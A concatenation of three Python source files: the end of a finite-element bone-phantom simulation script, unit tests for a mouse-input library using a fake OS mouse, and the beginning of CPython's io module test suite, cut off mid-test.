uniqueFaces volumeFaces = makeSkeletonVolumeFaces(vor.vertices, uniqueFacesRetain, voxelSize, volumeSizeVoxelsInitial) # Crop and Morphological closing on volume of edges volume = volumeFaces[:,:,25:125] volumeSizeVoxels = volume.shape # volume = binary_dilation(volume, morphDilationMask) volume = binary_closing(volume, morphClosingMask) volume = addPlatten(volume, plattenThicknessVoxels) # General optimization parameters Niters = 8 # Run Indicators iterVoxelsChanged = np.zeros(Niters) iterVoxelsTotal = np.zeros(Niters) iterElasticModulus = np.zeros(Niters) # Adaptation parameters, assume intercept of -1 for 0 stress # using VM stress instead Ul = Ul # 0.1 and 0.2 Uu = 0.8 # Make output directory out_dir = "/data/BoneBox-out/topopt/lazy_v3_sweep/randstate_"+str(randState)+saveNameAppend+"/" if not os.path.exists(out_dir): os.makedirs(out_dir) #% Iteratively perform FEA and augment volume shape np.save(out_dir+"volume_"+str(0), volume) for fea_iter in np.arange(Niters): # Save original volume at the start of iteration volume0 = volume.copy() # Convert to hex mesh for FEA volume = addPlatten(volume, plattenThicknessVoxels) nodes, elements = Voxel2HexaMeshIndexCoord(volume) nodes = Index2AbsCoords(nodes, volumeSizeVoxels, voxelSize=voxelSize) # Finite element analysis feaResult = computeFEACompressLinearHex(nodes, elements, plateThickness=plattenThicknessVoxels * voxelSize[0], \ elasticModulus=elasticModulus, poissonRatio=poissonRatio, \ force_total = forceTotal, solver="ParadisoMKL") # Compute elastic modulus elasticModulus = computeFEAElasticModulus(feaResult) iterElasticModulus[fea_iter] = elasticModulus print("Elastic Modulus:" + str(elasticModulus)) # Index coordinates of elements (voxel centers) nodesIndexCoord = Abs2IndexCoords(nodes, volumeSizeVoxels, voxelSize=voxelSize, origin=(0,0,0)) xyz = (nodesIndexCoord[elements,:][:,0,:] + 0.5).astype(int) xyzTuple = tuple(xyz.T) # Take absolute stresses arrayVM = setNanToZero(feaResult["elementVMstresses"].flatten()) arrayXX = setNanToZero(np.abs(feaResult["elementStresses"][:,0])) arrayYY = setNanToZero(np.abs(feaResult["elementStresses"][:,1])) arrayZZ = setNanToZero(np.abs(feaResult["elementStresses"][:,2])) # print("median strain energy:"+str(np.median(strainEnergyDensity))) print("median VM Stress:"+str(np.median(arrayVM))) # If MKL fails, will generate unlikely distribution if (np.median(arrayVM)>3.) or (np.median(arrayVM)<1e-3): # median VM stress implausibly large or small raise ValueError('MKL Solver probably failed, terminating this run') # Compute strain energy, probability, (using VM stress instead here) mask = strainEnergy2MaskLazyDiscrete(arrayVM, Ul, Uu) volume1 = volumeVoxelGrowRemove(volume, xyzTuple, mask) volume1 = addPlatten(volume1, plattenThicknessVoxels) # Convert to indexing coordinates, assign to voxels volumeVM = HexaMeshIndexCoord2VoxelValue(nodesIndexCoord, elements, volumeSizeVoxels, arrayVM) volumeXX = HexaMeshIndexCoord2VoxelValue(nodesIndexCoord, elements, volumeSizeVoxels, arrayXX) volumeYY = HexaMeshIndexCoord2VoxelValue(nodesIndexCoord, elements, volumeSizeVoxels, arrayYY) volumeZZ = HexaMeshIndexCoord2VoxelValue(nodesIndexCoord, elements, volumeSizeVoxels, arrayZZ) # volumeSED = HexaMeshIndexCoord2VoxelValue(nodesIndexCoord, elements, volumeSizeVoxels, strainEnergyDensity) #% Show volume slice (sagittal) dvolume = volume1.astype(int)-volume0.astype(int) volumeShow = np.zeros(volume.shape).astype(int) volumeShow[volume0==1] = 2 volumeShow[dvolume==-1] = 1 volumeShow[dvolume==1] = 3 # make a color map of fixed colors cmap = colors.ListedColormap(['white','red','gray','blue']) bounds=[-0.5, 0.5, 1.5, 2.5, 3.5] norm = colors.BoundaryNorm(bounds, cmap.N) fig = plt.figure(frameon=False) plt.imshow(volumeShow[:,50,:].T, cmap=cmap, norm=norm) plt.axis("off") plt.axis("tight") plt.savefig(out_dir+"vol_slice50_"+str(fea_iter)+".png") plt.close("all") #% Show mask histogram Nresorpt = np.sum(mask==-1) Ndeposit = np.sum(mask==1) Nunchanged = np.sum(mask==0) plt.bar([1,2,3],[Nresorpt,Nunchanged,Ndeposit]) plt.xticks([1,2,3], ["Resorpt", "Unchanged","Deposit"]) plt.savefig(out_dir+"dvolhist_slice50_"+str(fea_iter)+".png",bbox_inches='tight') plt.close("all") #% Visualize stress histogram fig_vm = np.linspace(0.001,5,1000) fig_p = strainEnergy2MaskLazyDiscrete(fig_vm, Ul, Uu) # fig_p = strainEnergyDensity2ProbabilityLinear(fig_vm, s0, slope, pmin=-1., pmax=1) fig, ax1 = plt.subplots() ax1.hist(arrayVM,bins=fig_vm) ax1.set_xlabel('Von Mises Stress (MPa)') ax1.set_ylabel('# Elements (Voxels)') ax2 = ax1.twinx() plt.plot(fig_vm,fig_p,'r--') ax2.set_ylabel('Deposition/Resorption Probability') plt.savefig(out_dir+"hist_"+str(fea_iter)+".png",bbox_inches='tight') plt.close("all") #% Hexamesh Visualizer # https://docs.pyvista.org/examples/00-load/create-unstructured-surface.html cpos = [(-22.333459061472976, 23.940062547377757, 1.7396451897739171), (-0.04999999999999982, -0.04999999999999982, -0.04999999999999982), (0.037118979271661946, -0.040009842455482315, 0.9985095862757241)] cmap = plt.cm.get_cmap("viridis", 512) # Each cell begins with the number of points in the cell and then the points composing the cell points = nodes cells = np.concatenate([(np.ones(elements.shape[0],dtype="int64")*8)[:,None], elements],axis=1).ravel() celltypes = np.repeat(np.array([vtk.VTK_HEXAHEDRON]), elements.shape[0]) offset = np.arange(elements.shape[0])*9 grid = pv.UnstructuredGrid(offset, cells, celltypes, points) pl = pv.Plotter(off_screen=True) pl.add_mesh(grid,show_edges=True, scalars=arrayVM, cmap=cmap, clim=(0,1)) pl.show(window_size=(3000,3000),cpos=cpos,screenshot=out_dir+"volume_"+str(fea_iter)+".png") # Save final phantom, both in volume and in mesh form np.save(out_dir+"volume_"+str(fea_iter+1), volume1) np.save(out_dir+"arrayVM_"+str(fea_iter), arrayVM) np.save(out_dir+"xyz"+str(fea_iter), xyz) # Save input parameters np.save(out_dir+"xyz"+str(fea_iter), xyz) # Output phantom properties (for BVF crop to avoid edge effects and platten). cropped_volume = volume1[15:85,15:85,15:85] out_bvf = np.sum(cropped_volume==1) / np.prod(cropped_volume.shape) out_elasticModulus = iterElasticModulus[-1] # Save BVF and Elastoc Modulus in seperate folders np.save(out_dir+"bvf"+str(fea_iter), out_bvf) np.save(out_dir+"elasticModulus"+str(fea_iter), out_elasticModulus) del volume, volume0, volume1, feaResult return out_dir, out_bvf, out_elasticModulus if __name__ == "__main__": import gc import os import psutil import signal # Try to launch function in seperate process to release unreachable memeory from multiprocessing import Process, Queue save_dir = "/data/BoneBox-out/topopt/lazy_v3_sweep/" if not os.path.exists(save_dir): os.makedirs(save_dir) # Generate N phantom series, 3 resorption intensities per series Nseries = 400 Nresorption = 3 # Track BVF and Elastic Moduli if os.path.exists(save_dir+"bvfs.npy"): bvfs = np.load(save_dir+"bvfs.npy") else: bvfs = np.zeros((Nseries, Nresorption)); bvfs[:] = np.nan if os.path.exists(save_dir+"Es.npy"): Es = np.load(save_dir+"Es.npy") else: Es = np.zeros((Nseries, Nresorption)); Es[:] = np.nan # Track Exception exceptedInstances = np.zeros((Nseries, Nresorption),dtype=bool) # Generate array of random Uls (between 0.1 and 0.25) randStateUls = 3012 Ulmin = 0.1 Ulmax = 0.25 Uls = sampleUniformZeroOne(((Nseries,Nresorption)), randState=randStateUls)*(Ulmax-Ulmin) + Ulmin # Save input parameters np.save(save_dir+"Uls", Uls) np.save(save_dir+"randStateUls", randStateUls) # Generate array of random seeds for scaffolding scaffoldSeeds = np.arange(Nseries,dtype=int) #%% Loop for ss in scaffoldSeeds[28:29]: for uu in range(Nresorption): print("==>> Phantom "+str(ss)) print("Ul="+str(Uls[ss,uu])) # String appended to the end of folder name saveNameAppend = "_phantom_ss_"+str(ss)+"_uu_"+str(uu) p = Process(target=generateLDPhantom, args=(Uls[ss,uu], ss, saveNameAppend)) p.start() p.join() # # Catch failed mkl solutions # try: # # out_dir, BVF, elasticModulus = generateLDPhantom(Uls[ss,uu], ss, saveNameAppend) # p = Process(generateLDPhantom, args=(Uls[ss,uu], ss, saveNameAppend)) # p.start() # p.join() # gc.collect() # # print("BVF="+str(BVF)) # # print("elasticModulus="+str(elasticModulus)) # # bvfs[ss,uu] = BVF # # Es[ss,uu] = elasticModulus # # np.save(save_dir+"bvfs", bvfs) # # np.save(save_dir+"Es", Es) # except: # print("MKL solver failed... moving on") # exceptedInstances[ss,uu] = True # # np.save(out_dir+"excepted", True) #% Remove all other processes other than main (persistent mkl kernels not ending) # currentId = os.getpid() # allPyIds = [p.pid for p in psutil.process_iter() if "python" in str(p.name)] # PyIdsToKill = [x for x in allPyIds if x != currentId] # for PyId in PyIdsToKill: # os.kill(PyId, signal.SIGTERM) #%% # ss = seed = 16; uu = 2 # print("==>> Phantom "+str(ss)) # print("Ul="+str(Uls[ss,uu])) # # String appended to the end of folder name # saveNameAppend = "_phantom_ss_"+str(ss)+"_uu_"+str(uu) # try: # out_dir, BVF, elasticModulus = generateLDPhantom(Uls[ss,uu], seed, saveNameAppend) # print("BVF="+str(BVF)) # print("elasticModulus="+str(elasticModulus)) # bvfs[ss,uu] = BVF # Es[ss,uu] = elasticModulus # np.save(save_dir+"bvfs", bvfs) # np.save(save_dir+"Es", Es) # except: # print("MKL solver failed... moving on")
_mouse_tests.py
# -*- coding: utf-8 -*- import unittest import time from ._mouse_event import MoveEvent, ButtonEvent, WheelEvent, LEFT, RIGHT, MIDDLE, X, X2, UP, DOWN, DOUBLE from keyboard import mouse class FakeOsMouse(object): def __init__(self): self.append = None self.position = (0, 0) self.queue = None self.init = lambda: None def listen(self, queue): self.listening = True self.queue = queue def press(self, button): self.append((DOWN, button)) def release(self, button): self.append((UP, button)) def get_position(self): return self.position def move_to(self, x, y): self.append(('move', (x, y))) self.position = (x, y) def wheel(self, delta): self.append(('wheel', delta)) def move_relative(self, x, y): self.position = (self.position[0] + x, self.position[1] + y) class TestMouse(unittest.TestCase): @staticmethod def setUpClass(): mouse._os_mouse= FakeOsMouse() mouse._listener.start_if_necessary() assert mouse._os_mouse.listening def setUp(self): self.events = [] mouse._pressed_events.clear() mouse._os_mouse.append = self.events.append def tearDown(self): mouse.unhook_all() # Make sure there's no spill over between tests. self.wait_for_events_queue() def wait_for_events_queue(self): mouse._listener.queue.join() def flush_events(self): self.wait_for_events_queue() events = list(self.events) # Ugly, but requried to work in Python2. Python3 has list.clear del self.events[:] return events def press(self, button=LEFT): mouse._os_mouse.queue.put(ButtonEvent(DOWN, button, time.time())) self.wait_for_events_queue() def release(self, button=LEFT): mouse._os_mouse.queue.put(ButtonEvent(UP, button, time.time())) self.wait_for_events_queue() def double_click(self, button=LEFT): mouse._os_mouse.queue.put(ButtonEvent(DOUBLE, button, time.time())) self.wait_for_events_queue() def click(self, button=LEFT): self.press(button) self.release(button) def wheel(self, delta=1): mouse._os_mouse.queue.put(WheelEvent(delta, time.time())) self.wait_for_events_queue() def move(self, x=0, y=0): mouse._os_mouse.queue.put(MoveEvent(x, y, time.time())) self.wait_for_events_queue() def test_hook(self): events = [] self.press() mouse.hook(events.append) self.press() mouse.unhook(events.append) self.press() self.assertEqual(len(events), 1) def test_is_pressed(self): self.assertFalse(mouse.is_pressed()) self.press() self.assertTrue(mouse.is_pressed()) self.release() self.press(X2) self.assertFalse(mouse.is_pressed()) self.assertTrue(mouse.is_pressed(X2)) self.press(X2) self.assertTrue(mouse.is_pressed(X2)) self.release(X2) self.release(X2) self.assertFalse(mouse.is_pressed(X2)) def test_buttons(self): mouse.press() self.assertEqual(self.flush_events(), [(DOWN, LEFT)]) mouse.release() self.assertEqual(self.flush_events(), [(UP, LEFT)]) mouse.click() self.assertEqual(self.flush_events(), [(DOWN, LEFT), (UP, LEFT)]) mouse.double_click() self.assertEqual(self.flush_events(), [(DOWN, LEFT), (UP, LEFT), (DOWN, LEFT), (UP, LEFT)]) mouse.right_click() self.assertEqual(self.flush_events(), [(DOWN, RIGHT), (UP, RIGHT)]) mouse.click(RIGHT) self.assertEqual(self.flush_events(), [(DOWN, RIGHT), (UP, RIGHT)]) mouse.press(X2) self.assertEqual(self.flush_events(), [(DOWN, X2)]) def test_position(self): self.assertEqual(mouse.get_position(), mouse._os_mouse.get_position()) def test_move(self): mouse.move(0, 0) self.assertEqual(mouse._os_mouse.get_position(), (0, 0)) mouse.move(100, 500) self.assertEqual(mouse._os_mouse.get_position(), (100, 500)) mouse.move(1, 2, False) self.assertEqual(mouse._os_mouse.get_position(), (101, 502)) mouse.move(0, 0) mouse.move(100, 499, True, duration=0.01) self.assertEqual(mouse._os_mouse.get_position(), (100, 499)) mouse.move(100, 1, False, duration=0.01) self.assertEqual(mouse._os_mouse.get_position(), (200, 500)) mouse.move(0, 0, False, duration=0.01) self.assertEqual(mouse._os_mouse.get_position(), (200, 500)) def triggers(self, fn, events, **kwargs): self.triggered = False def callback(): self.triggered = True handler = fn(callback, **kwargs) for event_type, arg in events: if event_type == DOWN: self.press(arg) elif event_type == UP: self.release(arg) elif event_type == DOUBLE: self.double_click(arg) elif event_type == 'WHEEL': self.wheel() mouse._listener.remove_handler(handler) return self.triggered def test_on_button(self): self.assertTrue(self.triggers(mouse.on_button, [(DOWN, LEFT)])) self.assertTrue(self.triggers(mouse.on_button, [(DOWN, RIGHT)])) self.assertTrue(self.triggers(mouse.on_button, [(DOWN, X)])) self.assertFalse(self.triggers(mouse.on_button, [('WHEEL', '')])) self.assertFalse(self.triggers(mouse.on_button, [(DOWN, X)], buttons=MIDDLE)) self.assertTrue(self.triggers(mouse.on_button, [(DOWN, MIDDLE)], buttons=MIDDLE)) self.assertTrue(self.triggers(mouse.on_button, [(DOWN, MIDDLE)], buttons=MIDDLE)) self.assertFalse(self.triggers(mouse.on_button, [(DOWN, MIDDLE)], buttons=MIDDLE, types=UP)) self.assertTrue(self.triggers(mouse.on_button, [(UP, MIDDLE)], buttons=MIDDLE, types=UP)) self.assertTrue(self.triggers(mouse.on_button, [(UP, MIDDLE)], buttons=[MIDDLE, LEFT], types=[UP, DOWN])) self.assertTrue(self.triggers(mouse.on_button, [(DOWN, LEFT)], buttons=[MIDDLE, LEFT], types=[UP, DOWN])) self.assertFalse(self.triggers(mouse.on_button, [(UP, X)], buttons=[MIDDLE, LEFT], types=[UP, DOWN])) def test_ons(self): self.assertTrue(self.triggers(mouse.on_click, [(UP, LEFT)])) self.assertFalse(self.triggers(mouse.on_click, [(UP, RIGHT)])) self.assertFalse(self.triggers(mouse.on_click, [(DOWN, LEFT)])) self.assertFalse(self.triggers(mouse.on_click, [(DOWN, RIGHT)])) self.assertTrue(self.triggers(mouse.on_double_click, [(DOUBLE, LEFT)])) self.assertFalse(self.triggers(mouse.on_double_click, [(DOUBLE, RIGHT)])) self.assertFalse(self.triggers(mouse.on_double_click, [(DOWN, RIGHT)])) self.assertTrue(self.triggers(mouse.on_right_click, [(UP, RIGHT)])) self.assertTrue(self.triggers(mouse.on_middle_click, [(UP, MIDDLE)])) def test_wait(self): # If this fails it blocks. Unfortunately, but I see no other way of testing. from threading import Thread, Lock lock = Lock() lock.acquire() def t(): mouse.wait() lock.release() Thread(target=t).start() self.press() lock.acquire() def test_record_play(self): from threading import Thread, Lock lock = Lock() lock.acquire() def t(): self.recorded = mouse.record(RIGHT) lock.release() Thread(target=t).start() self.click() self.wheel(5) self.move(100, 50) self.press(RIGHT) lock.acquire() self.assertEqual(len(self.recorded), 5) self.assertEqual(self.recorded[0]._replace(time=None), ButtonEvent(DOWN, LEFT, None)) self.assertEqual(self.recorded[1]._replace(time=None), ButtonEvent(UP, LEFT, None)) self.assertEqual(self.recorded[2]._replace(time=None), WheelEvent(5, None)) self.assertEqual(self.recorded[3]._replace(time=None), MoveEvent(100, 50, None)) self.assertEqual(self.recorded[4]._replace(time=None), ButtonEvent(DOWN, RIGHT, None)) mouse.play(self.recorded, speed_factor=0) events = self.flush_events() self.assertEqual(len(events), 5) self.assertEqual(events[0], (DOWN, LEFT)) self.assertEqual(events[1], (UP, LEFT)) self.assertEqual(events[2], ('wheel', 5)) self.assertEqual(events[3], ('move', (100, 50))) self.assertEqual(events[4], (DOWN, RIGHT)) mouse.play(self.recorded) events = self.flush_events() self.assertEqual(len(events), 5) self.assertEqual(events[0], (DOWN, LEFT)) self.assertEqual(events[1], (UP, LEFT)) self.assertEqual(events[2], ('wheel', 5)) self.assertEqual(events[3], ('move', (100, 50))) self.assertEqual(events[4], (DOWN, RIGHT)) mouse.play(self.recorded, include_clicks=False) events = self.flush_events() self.assertEqual(len(events), 2) self.assertEqual(events[0], ('wheel', 5)) self.assertEqual(events[1], ('move', (100, 50))) mouse.play(self.recorded, include_moves=False) events = self.flush_events() self.assertEqual(len(events), 4) self.assertEqual(events[0], (DOWN, LEFT)) self.assertEqual(events[1], (UP, LEFT)) self.assertEqual(events[2], ('wheel', 5)) self.assertEqual(events[3], (DOWN, RIGHT)) mouse.play(self.recorded, include_wheel=False) events = self.flush_events() self.assertEqual(len(events), 4) self.assertEqual(events[0], (DOWN, LEFT)) self.assertEqual(events[1], (UP, LEFT)) self.assertEqual(events[2], ('move', (100, 50))) self.assertEqual(events[3], (DOWN, RIGHT)) if __name__ == '__main__': unittest.main()
test_io.py
"""Unit tests for the io module.""" # Tests of io are scattered over the test suite: # * test_bufio - tests file buffering # * test_memoryio - tests BytesIO and StringIO # * test_fileio - tests FileIO # * test_file - tests the file interface # * test_io - tests everything else in the io module # * test_univnewlines - tests universal newline support # * test_largefile - tests operations on a file greater than 2**32 bytes # (only enabled with -ulargefile) ################################################################################ # ATTENTION TEST WRITERS!!! ################################################################################ # When writing tests for io, it's important to test both the C and Python # implementations. This is usually done by writing a base test that refers to # the type it is testing as an attribute. Then it provides custom subclasses to # test both implementations. This file has lots of examples. ################################################################################ import abc import array import errno import locale import os import pickle import random import signal import sys import sysconfig import textwrap import threading import time import unittest import warnings import weakref from collections import deque, UserList from itertools import cycle, count from test import support from test.support.script_helper import ( assert_python_ok, assert_python_failure, run_python_until_end) from test.support import FakePath import codecs import io # C implementation of io import _pyio as pyio # Python implementation of io try: import ctypes except ImportError: def byteslike(*pos, **kw): return array.array("b", bytes(*pos, **kw)) else: def byteslike(*pos, **kw): """Create a bytes-like object having no string or sequence methods""" data = bytes(*pos, **kw) obj = EmptyStruct() ctypes.resize(obj, len(data)) memoryview(obj).cast("B")[:] = data return obj class EmptyStruct(ctypes.Structure): pass _cflags = sysconfig.get_config_var('CFLAGS') or '' _config_args = sysconfig.get_config_var('CONFIG_ARGS') or '' MEMORY_SANITIZER = ( '-fsanitize=memory' in _cflags or '--with-memory-sanitizer' in _config_args ) # Does io.IOBase finalizer log the exception if the close() method fails? # The exception is ignored silently by default in release build. IOBASE_EMITS_UNRAISABLE = (hasattr(sys, "gettotalrefcount") or sys.flags.dev_mode) def _default_chunk_size(): """Get the default TextIOWrapper chunk size""" with open(__file__, "r", encoding="latin-1") as f: return f._CHUNK_SIZE class MockRawIOWithoutRead: """A RawIO implementation without read(), so as to exercise the default RawIO.read() which calls readinto().""" def __init__(self, read_stack=()): self._read_stack = list(read_stack) self._write_stack = [] self._reads = 0 self._extraneous_reads = 0 def write(self, b): self._write_stack.append(bytes(b)) return len(b) def writable(self): return True def fileno(self): return 42 def readable(self): return True def seekable(self): return True def seek(self, pos, whence): return 0 # wrong but we gotta return something def tell(self): return 0 # same comment as above def readinto(self, buf): self._reads += 1 max_len = len(buf) try: data = self._read_stack[0] except IndexError: self._extraneous_reads += 1 return 0 if data is None: del self._read_stack[0] return None n = len(data) if len(data) <= max_len: del self._read_stack[0] buf[:n] = data return n else: buf[:] = data[:max_len] self._read_stack[0] = data[max_len:] return max_len def truncate(self, pos=None): return pos class CMockRawIOWithoutRead(MockRawIOWithoutRead, io.RawIOBase): pass class PyMockRawIOWithoutRead(MockRawIOWithoutRead, pyio.RawIOBase): pass class MockRawIO(MockRawIOWithoutRead): def read(self, n=None): self._reads += 1 try: return self._read_stack.pop(0) except: self._extraneous_reads += 1 return b"" class CMockRawIO(MockRawIO, io.RawIOBase): pass class PyMockRawIO(MockRawIO, pyio.RawIOBase): pass class MisbehavedRawIO(MockRawIO): def write(self, b): return super().write(b) * 2 def read(self, n=None): return super().read(n) * 2 def seek(self, pos, whence): return -123 def tell(self): return -456 def readinto(self, buf): super().readinto(buf) return len(buf) * 5 class CMisbehavedRawIO(MisbehavedRawIO, io.RawIOBase): pass class PyMisbehavedRawIO(MisbehavedRawIO, pyio.RawIOBase): pass class SlowFlushRawIO(MockRawIO): def __init__(self): super().__init__() self.in_flush = threading.Event() def flush(self): self.in_flush.set() time.sleep(0.25) class CSlowFlushRawIO(SlowFlushRawIO, io.RawIOBase): pass class PySlowFlushRawIO(SlowFlushRawIO, pyio.RawIOBase): pass class CloseFailureIO(MockRawIO): closed = 0 def close(self): if not self.closed: self.closed = 1 raise OSError class CCloseFailureIO(CloseFailureIO, io.RawIOBase): pass class PyCloseFailureIO(CloseFailureIO, pyio.RawIOBase): pass class MockFileIO: def __init__(self, data): self.read_history = [] super().__init__(data) def read(self, n=None): res = super().read(n) self.read_history.append(None if res is None else len(res)) return res def readinto(self, b): res = super().readinto(b) self.read_history.append(res) return res class CMockFileIO(MockFileIO, io.BytesIO): pass class PyMockFileIO(MockFileIO, pyio.BytesIO): pass class MockUnseekableIO: def seekable(self): return False def seek(self, *args): raise self.UnsupportedOperation("not seekable") def tell(self, *args): raise self.UnsupportedOperation("not seekable") def truncate(self, *args): raise self.UnsupportedOperation("not seekable") class CMockUnseekableIO(MockUnseekableIO, io.BytesIO): UnsupportedOperation = io.UnsupportedOperation class PyMockUnseekableIO(MockUnseekableIO, pyio.BytesIO): UnsupportedOperation = pyio.UnsupportedOperation class MockNonBlockWriterIO: def __init__(self): self._write_stack = [] self._blocker_char = None def pop_written(self): s = b"".join(self._write_stack) self._write_stack[:] = [] return s def block_on(self, char): """Block when a given char is encountered.""" self._blocker_char = char def readable(self): return True def seekable(self): return True def seek(self, pos, whence=0): # naive implementation, enough for tests return 0 def writable(self): return True def write(self, b): b = bytes(b) n = -1 if self._blocker_char: try: n = b.index(self._blocker_char) except ValueError: pass else: if n > 0: # write data up to the first blocker self._write_stack.append(b[:n]) return n else: # cancel blocker and indicate would block self._blocker_char = None return None self._write_stack.append(b) return len(b) class CMockNonBlockWriterIO(MockNonBlockWriterIO, io.RawIOBase): BlockingIOError = io.BlockingIOError class PyMockNonBlockWriterIO(MockNonBlockWriterIO, pyio.RawIOBase): BlockingIOError = pyio.BlockingIOError class IOTest(unittest.TestCase): def setUp(self): support.unlink(support.TESTFN) def tearDown(self): support.unlink(support.TESTFN) def write_ops(self, f): self.assertEqual(f.write(b"blah."), 5) f.truncate(0) self.assertEqual(f.tell(), 5) f.seek(0) self.assertEqual(f.write(b"blah."), 5) self.assertEqual(f.seek(0), 0) self.assertEqual(f.write(b"Hello."), 6) self.assertEqual(f.tell(), 6) self.assertEqual(f.seek(-1, 1), 5) self.assertEqual(f.tell(), 5) buffer = bytearray(b" world\n\n\n") self.assertEqual(f.write(buffer), 9) buffer[:] = b"*" * 9 # Overwrite our copy of the data self.assertEqual(f.seek(0), 0) self.assertEqual(f.write(b"h"), 1) self.assertEqual(f.seek(-1, 2), 13) self.assertEqual(f.tell(), 13) self.assertEqual(f.truncate(12), 12) self.assertEqual(f.tell(), 13) self.assertRaises(TypeError, f.seek, 0.0) def read_ops(self, f, buffered=False): data = f.read(5) self.assertEqual(data, b"hello") data = byteslike(data) self.assertEqual(f.readinto(data), 5) self.assertEqual(bytes(data), b" worl") data = bytearray(5) self.assertEqual(f.readinto(data), 2) self.assertEqual(len(data), 5) self.assertEqual(data[:2], b"d\n") self.assertEqual(f.seek(0), 0) self.assertEqual(f.read(20), b"hello world\n") self.assertEqual(f.read(1), b"") self.assertEqual(f.readinto(byteslike(b"x")), 0) self.assertEqual(f.seek(-6, 2), 6) self.assertEqual(f.read(5), b"world") self.assertEqual(f.read(0), b"") self.assertEqual(f.readinto(byteslike()), 0) self.assertEqual(f.seek(-6, 1), 5) self.assertEqual(f.read(5), b" worl") self.assertEqual(f.tell(), 10) self.assertRaises(TypeError, f.seek, 0.0) if buffered: f.seek(0) self.assertEqual(f.read(), b"hello world\n") f.seek(6) self.assertEqual(f.read(), b"world\n") self.assertEqual(f.read(), b"") f.seek(0) data = byteslike(5) self.assertEqual(f.readinto1(data), 5) self.assertEqual(bytes(data), b"hello") LARGE = 2**31 def large_file_ops(self, f): assert f.readable() assert f.writable() try: self.assertEqual(f.seek(self.LARGE), self.LARGE) except (OverflowError, ValueError): self.skipTest("no largefile support") self.assertEqual(f.tell(), self.LARGE) self.assertEqual(f.write(b"xxx"), 3) self.assertEqual(f.tell(), self.LARGE + 3) self.assertEqual(f.seek(-1, 1), self.LARGE + 2) self.assertEqual(f.truncate(), self.LARGE + 2) self.assertEqual(f.tell(), self.LARGE + 2) self.assertEqual(f.seek(0, 2), self.LARGE + 2) self.assertEqual(f.truncate(self.LARGE + 1), self.LARGE + 1) self.assertEqual(f.tell(), self.LARGE + 2) self.assertEqual(f.seek(0, 2), self.LARGE + 1) self.assertEqual(f.seek(-1, 2), self.LARGE) self.assertEqual(f.read(2), b"x") def test_invalid_operations(self): # Try writing on a file opened in read mode and vice-versa. exc = self.UnsupportedOperation for mode in ("w", "wb"): with self.open(support.TESTFN, mode) as fp: self.assertRaises(exc, fp.read) self.assertRaises(exc, fp.readline) with self.open(support.TESTFN, "wb", buffering=0) as fp: self.assertRaises(exc, fp.read) self.assertRaises(exc, fp.readline) with self.open(support.TESTFN, "rb", buffering=0) as fp: self.assertRaises(exc, fp.write, b"blah") self.assertRaises(exc, fp.writelines, [b"blah\n"]) with self.open(support.TESTFN, "rb") as fp: self.assertRaises(exc, fp.write, b"blah") self.assertRaises(exc, fp.writelines, [b"blah\n"]) with self.open(support.TESTFN, "r") as fp: self.assertRaises(exc, fp.write, "blah") self.assertRaises(exc, fp.writelines, ["blah\n"]) # Non-zero seeking from current or end pos self.assertRaises(exc, fp.seek, 1, self.SEEK_CUR) self.assertRaises(exc, fp.seek, -1, self.SEEK_END) def test_optional_abilities(self): # Test for OSError when optional APIs are not supported # The purpose of this test is to try fileno(), reading, writing and # seeking operations with various objects that indicate they do not # support these operations. def pipe_reader(): [r, w] = os.pipe() os.close(w) # So that read() is harmless return self.FileIO(r, "r") def pipe_writer(): [r, w] = os.pipe() self.addCleanup(os.close, r) # Guarantee that we can write into the pipe without blocking thread = threading.Thread(target=os.read, args=(r, 100)) thread.start() self.addCleanup(thread.join) return self.FileIO(w, "w") def buffered_reader(): return self.BufferedReader(self.MockUnseekableIO()) def buffered_writer(): return self.BufferedWriter(self.MockUnseekableIO()) def buffered_random(): return self.BufferedRandom(self.BytesIO()) def buffered_rw_pair(): return self.BufferedRWPair(self.MockUnseekableIO(), self.MockUnseekableIO()) def text_reader(): class UnseekableReader(self.MockUnseekableIO): writable = self.BufferedIOBase.writable write = self.BufferedIOBase.write return self.TextIOWrapper(UnseekableReader(), "ascii") def text_writer(): class UnseekableWriter(self.MockUnseekableIO): readable = self.BufferedIOBase.readable read = self.BufferedIOBase.read return self.TextIOWrapper(UnseekableWriter(), "ascii") tests = ( (pipe_reader, "fr"), (pipe_writer, "fw"), (buffered_reader, "r"), (buffered_writer, "w"), (buffered_random, "rws"), (buffered_rw_pair, "rw"), (text_reader, "r"), (text_writer, "w"), (self.BytesIO, "rws"), (self.StringIO, "rws"), ) for [test, abilities] in tests: with self.subTest(test), test() as obj: readable = "r" in abilities self.assertEqual(obj.readable(), readable) writable = "w" in abilities self.assertEqual(obj.writable(), writable) if isinstance(obj, self.TextIOBase): data = "3" elif isinstance(obj, (self.BufferedIOBase, self.RawIOBase)): data = b"3" else: self.fail("Unknown base class") if "f" in abilities: obj.fileno() else: self.assertRaises(OSError, obj.fileno) if readable: obj.read(1) obj.read() else: self.assertRaises(OSError, obj.read, 1) self.assertRaises(OSError, obj.read) if writable: obj.write(data) else: self.assertRaises(OSError, obj.write, data) if sys.platform.startswith("win") and test in ( pipe_reader, pipe_writer): # Pipes seem to appear as seekable on Windows continue seekable = "s" in abilities self.assertEqual(obj.seekable(), seekable) if seekable: obj.tell() obj.seek(0) else: self.assertRaises(OSError, obj.tell) self.assertRaises(OSError, obj.seek, 0) if writable and seekable: obj.truncate() obj.truncate(0) else: self.assertRaises(OSError, obj.truncate) self.assertRaises(OSError, obj.truncate, 0) def test_open_handles_NUL_chars(self): fn_with_NUL = 'foo\0bar' self.assertRaises(ValueError, self.open, fn_with_NUL, 'w') bytes_fn = bytes(fn_with_NUL, 'ascii') with warnings.catch_warnings(): warnings.simplefilter("ignore", DeprecationWarning) self.assertRaises(ValueError, self.open, bytes_fn, 'w') def test_raw_file_io(self): with self.open(support.TESTFN, "wb", buffering=0) as f: self.assertEqual(f.readable(), False) self.assertEqual(f.writable(), True) self.assertEqual(f.seekable(), True) self.write_ops(f) with self.open(support.TESTFN, "rb", buffering=0) as f: self.assertEqual(f.readable(), True) self.assertEqual(f.writable(), False) self.assertEqual(f.seekable(), True) self.read_ops(f) def test_buffered_file_io(self): with self.open(support.TESTFN, "wb") as f: self.assertEqual(f.readable(), False) self.assertEqual(f.writable(), True) self.assertEqual(f.seekable(), True) self.write_ops(f) with self.open(support.TESTFN, "rb") as f: self.assertEqual(f.readable(), True) self.assertEqual(f.writable(), False) self.assertEqual(f.seekable(), True) self.read_ops(f, True) def test_readline(self): with self.open(support.TESTFN, "wb") as f: f.write(b"abc\ndef\nxyzzy\nfoo\x00bar\nanother line") with self.open(support.TESTFN, "rb") as f: self.assertEqual(f.readline(), b"abc\n") self.assertEqual(f.readline(10), 